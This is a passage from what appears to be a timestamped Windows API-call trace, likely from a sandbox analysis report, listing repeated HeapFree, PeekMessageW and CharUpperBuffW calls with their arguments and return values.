hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.449] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.449] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.450] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.450] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.451] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.451] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.451] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.451] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.451] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.451] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.451] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.452] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.453] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.454] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.455] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.456] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.457] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.458] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) 